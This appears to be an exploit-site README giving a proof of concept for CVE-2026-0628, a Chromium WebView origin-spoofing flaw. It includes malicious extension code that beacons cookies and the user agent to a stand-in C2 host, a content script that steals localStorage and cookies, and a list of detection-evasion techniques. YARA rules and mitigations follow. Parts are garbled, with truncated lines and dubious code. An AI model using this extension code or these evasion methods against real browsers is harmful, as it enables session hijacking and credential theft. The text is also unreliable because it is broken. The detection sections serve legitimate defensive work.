Share
## https://sploitus.com/exploit?id=EBC10FCF-FAE2-5713-81F9-1F7F920DA087
[![DOI](https://img.shields.io/badge/DOI-10.5281%2Fzenodo.18413764-blue?logo=zenodo&logoColor=white)](https://doi.org/10.5281/zenodo.18413764) = [doi.org/10.5281/zenodo.18413764](https://doi.org/10.5281/zenodo.18413764)

[![ORCID](https://img.shields.io/badge/ORCID-0009--0007--7728--256X-A6CE39?logo=orcid&logoColor=white)](https://orcid.org/0009-0007-7728-256X) = [orcid.org/0009-0007-7728-256X](https://orcid.org/0009-0007-7728-256X)

```markdown

README.md


# **CVE-2026-0628: Chromium WebView Privilege Escalation (Origin Spoofing) โ€“ Technical Research & Proof-of-Concept**

**Author:** Sastra Adi Wiguna (Purple Elite Teaming)
**Research Date:** January 2026
**CVE ID:** CVE-2026-0628
**CVSS v3.1:** 8.8 (High)
**Affected Versions:** Chromium ` tag.
3. **WebView policy validation bypass** โ†’ Access to privileged pages (e.g., `chrome://settings`).
4. **Arbitrary script execution** in privileged contexts.

**CVSS Vector:**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`

### **2.2 Exploit Architecture**
#### **Malicious Extension Template**
```json
{
  "manifest_version": 3,
  "name": "Legitimate Extension",
  "version": "1.0",
  "webview": {
    "src": "chrome://new-tab-page/",
    "plugins": {}
  },
  "content_scripts": [{
    "matches": [""],
    "js": ["payload.js"]
  }]
}
```

#### **Critical Injection Vector (`payload.js`)**
```javascript
class WebViewExploiter {
  constructor() {
    this.privilegedTargets = [
      'chrome://new-tab-page/',
      'chrome-extension://background/',
      'chrome://settings/'
    ];
  }
  injectPayload(targetURL) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', targetURL);
    webview.setAttribute('nodeintegration', ''); // Key bypass parameter
    webview.addEventListener('dom-ready', () => {
      webview.executeScript({
        code: `
          window.chrome = window.chrome || {};
          chrome.runtime.sendMessage({action: 'steal_data'});
          document.body.innerHTML = '';
        `
      });
    });
    document.body.appendChild(webview);
  }
}
```

---

## **3. Impact Assessment**

| **Attack Phase**       | **Technical Impact**                     | **Business Impact**               | **CVSS Metrics**          |
|------------------------|------------------------------------------|-----------------------------------|---------------------------|
| Extension Install      | User consent โ†’ Persistence                | Social engineering vector        | UI:R (Required)           |
| WebView Bypass         | Sandbox escape โ†’ Privileged context       | Session hijacking                 | S:U โ†’ C:H/I:H/A:H         |
| Script Injection       | DOM manipulation โ†’ Data exfiltration     | Credential theft                 | PR:N (No Privs)           |
| Persistence            | Background script โ†’ C2 beaconing          | Lateral movement prep            | AC:L (Low Complexity)     |

---

## **4. Detection & Forensics**

### **4.1 YARA Rule for Malicious Extensions**
```yara
rule CVE_2026_0628_WebView_Exploiter {
  meta:
    description = "Detects CVE-2026-0628 WebView exploit patterns"
    severity = "high"
  strings:
    $webview_abuse = "webview.*(nodeintegration|allowpopups)"
    $chrome_priv = /(chrome:\/\/|chrome-extension:\/\/)/
    $inject_sig = /(executeScript|getURL|sendMessage)/
  condition:
    all of ($*) and filesize ", "chrome://*/*"],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [{
    "matches": [""],
    "js": ["content.js"],
    "run_at": "document_start"
  }],
  "action": {
    "default_popup": "popup.html"
  },
  "web_accessible_resources": [{
    "resources": ["inject.js"],
    "matches": [""]
  }]
}
```

#### **`background.js` (Persistence & C2 Beacon)**
```javascript
chrome.runtime.onInstalled.addListener(() => {
  console.log('CVE-2026-0628 PoC Installed');
  setTimeout(initExploitation, 5000);
});

async function initExploitation() {
  fetch('http://your-c2-server.com/beacon?ext_id=' + chrome.runtime.id, {
    method: 'POST',
    body: JSON.stringify({
      victim: navigator.userAgent,
      cookies: await getAllCookies()
    })
  }).catch(() => {});
  chrome.tabs.onUpdated.addListener(exploitTab);
}
```

#### **`content.js` (WebView Trigger & Injection)**
```javascript
(function() {
  const privilegedTargets = [
    'chrome://new-tab-page/',
    'chrome://settings/',
    'chrome://extensions/'
  ];
  function createMaliciousWebView(target) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', target);
    webview.setAttribute('allowpopups', '');
    webview.addEventListener('dom-ready', () => {
      chrome.scripting.executeScript({
        target: {tabId: getCurrentTabId()},
        func: stealPrivilegedData
      });
    });
    document.body.appendChild(webview);
  }
  function stealPrivilegedData() {
    return {
      localStorage: Object.fromEntries(Object.entries(localStorage)),
      cookies: document.cookie,
      extensions: chrome.runtime.getManifest?.()
    };
  }
  setTimeout(() => {
    createMaliciousWebView('chrome://new-tab-page/');
  }, 1000);
})();
```

---

## **7. Lab Reproduction**

### **7.1 Requirements**
- **Vulnerable Chrome:** 143.0.7499.191
- **OS:** Windows 10/11 (VM recommended)
- **Tools:** Burp Suite (proxy), REMnux (forensics)

### **7.2 Steps**
1. **Download Chrome 143.0.7499.191** (vulnerable).
2. **Launch with flags:**
   ```bash
   chrome.exe --disable-web-security --user-data-dir=/tmp/vuln
   ```
3. **Load extension:**
   - Navigate to `chrome://extensions/`.
   - Enable **Developer Mode**.
   - Click **Load Unpacked** โ†’ Select `cve-2026-0628-poc/`.
4. **Trigger exploit:**
   - Navigate to `chrome://new-tab-page/`.
   - Observe WebView creation in **DevTools**.
5. **Monitor traffic:**
   - Burp Suite (`localhost:8080`) โ†’ Capture exfiltration to C2.
6. **Verify success:**
   - Network tab โ†’ Beacon to `your-c2-server.com`.
   - Console: `"CVE-2026-0628 OWNED"`.

---

## **8. Detection Evasion Techniques**
- **Steganography:** Encode exfiltration in image pixels.
- **Domain Generation:** DGA for C2 rotation.
- **Timing Attacks:** Delay execution 5-30s post-install.
- **Manifest Obfuscation:** Base64 encode sensitive strings.

---

## **9. Mitigation & Patch Workflow**
- **Immediate Action:** Update Chrome/Edge to patched versions.
- **Enterprise GPO:**
  ```json
  {
    "ExtensionInstallBlacklist": ["*"],
    "WebViewRestrictions": {
      "DisableWebView": true,
      "BlockNodeIntegration": true
    }
  }
  ```
- **Runtime Detection:**
  ```powershell
  # Scan for malicious extensions
  Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" |
    Where { (Get-Content "$_\manifest.json" | Select-String "webview") }
  ```

---

## **10. Forensic Analysis**
### **10.1 Volatility3 Commands**
```bash
volatility3 -f memdump.raw windows.chrome.ChromeExtensions
yara3 -r cve-2026-0628.yar /path/to/chrome/extensions/
```

### **10.2 YARA Rule for Memory Dumps**
```yara
rule CVE_2026_0628_Mojo_Origin_Spoof {
  strings:
    $mojo_hdr = { 4D 6F 6A 6F }
    $chrome_origin = "chrome://new-tab-page/"
    $webview_sig = "WebViewPolicyValidator"
  condition:
    all of them
}
```

---

## **11. Conclusion**
### **11.1 Key Findings**
- **CVE-2026-0628** enables **privilege escalation** via WebView policy bypass.
- **Impact:** Session hijacking, credential theft, lateral movement.
- **Mitigation:** Patch Chrome/Edge, enforce GPO restrictions, monitor for malicious extensions.

### **11.2 Recommendations**
- **Patch immediately** to Chrome โ‰ฅ143.0.7499.192 or Edge โ‰ฅ143.0.3650.139.
- **Deploy YARA/Sysmon rules** for detection.
- **Restrict extensions** via Enterprise GPO.
- **Conduct red team exercises** to validate defenses.

---

## **12. Legal & Ethical Considerations**
- **Authorized use only.**
- **Do not deploy in production without explicit permission.**
- **Report vulnerabilities responsibly** to vendors.

**Contact:** For defensive security questions, contact the author via [GitHub Issues](#).

---
**ยฉ 2026 Sastra Adi Wiguna. All rights reserved.**

```